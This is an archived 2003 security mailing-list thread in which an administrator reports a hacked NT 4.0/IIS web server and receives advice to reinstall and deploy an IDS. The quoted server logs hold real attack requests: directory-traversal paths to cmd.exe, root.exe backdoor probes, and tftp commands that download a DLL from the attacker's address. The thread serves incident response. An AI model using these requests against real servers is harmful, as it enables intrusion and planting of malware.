Security Incidents mailing list archives
Re: Hacked web server
From: "Tibor Biro" <tiborbiro () rogers com>
Date: Sun, 12 Jan 2003 18:43:08 -0500
Looks like your server was hacked by using an old exploit, check out this link for more information. http://www.securiteam.com/exploits/Additional_details_about_the_IIS_remote_e xecution_vulnerability.html This vulnerability allows the hacker to get to your server through port 80 completely bypassing your firewall. You might want to consider installing an IDS, Snort comes to mind. If I were you I would reinstall the entire server from scratch, your guest might have opened some other doors. To trace the hacker you can start by doing a reverse lookup on the address you got in the IIS log file. If your server is not configured to receive email then your mailroot/drop folder should be empty. You can safely delete all files/folders from there. Regards, Tibor Biro ----- Original Message ----- From: "Rogelio Vidaurri Courcelle" <rvidaurri () haciendachiapas gob mx> To: <incidents () securityfocus com> Sent: Friday, January 10, 2003 3:39 PM Subject: Hacked web server Hi... my web server (NT 4.0 SP6a) was hacked last friday, it has only one NIC with a public IP we have an OpenBSD Firewall (PF) that filters both incoming and outcoming traffic.... this firewall has no ip addresses..... external users have access to our web server only by port 80... we had a popup window in our default page.... i dont know if that's why he could hack our server.... i'm not an expert in these.. i'm a begineer..... (my english is not perfect sorry for the inconviniences)... anyway.. we deleted that popup window and haven't been hacked again... we try to patch our server but the patch "destroyed" my IIS 4.0 and we had to reinstall everything.... in my LOGFILES i have te records of our visits.... and since 2 months ago it's been registering this: 200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0, 72, 275, 403, 5, GET, /scripts/root.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 0, 70, 119, 404, 2, GET, /MSADC/root.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0, 79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 145, 261, 500, 123, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe , /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 261, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 16, 97, 275, 403, 5, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..À¯../winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..Áœ../winnt/system32/cmd.exe, /c+dir, i have read that it could be because of Nimda but i have scanned with the latest pattern and it found no viruses... only a backdoor trojan called ncx99.exe dropped in mailroot\drop\temp by the way, can i delete files inside that folder??? there's a rundlls32.exe... a KEY file, etcetera...... what can it be? i need help... how could i trace the hacker?? thanks in advance..... ISC. Rogelio Vidaurri Courcelle Área de Sistemas y Web Secretaría de Hacienda ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Hacked web server Rogelio Vidaurri Courcelle (Jan 12)
- Re: Hacked web server Tibor Biro (Jan 12)
- Re: Hacked web server Michael Katz (Jan 12)
- Re: Hacked web server sunzi (Jan 14)
- RE: Hacked web server Michael LaSalvia (Jan 15)
- Re: Hacked web server Ryan Yagatich (Jan 21)
- RE: Hacked web server Jason Coombs (Jan 23)
- RE: Hacked web server Ryan Yagatich (Jan 25)
- RE: Hacked web server Jason Coombs (Jan 23)
- <Possible follow-ups>
- Re: Hacked web server John Pugh (Jan 23)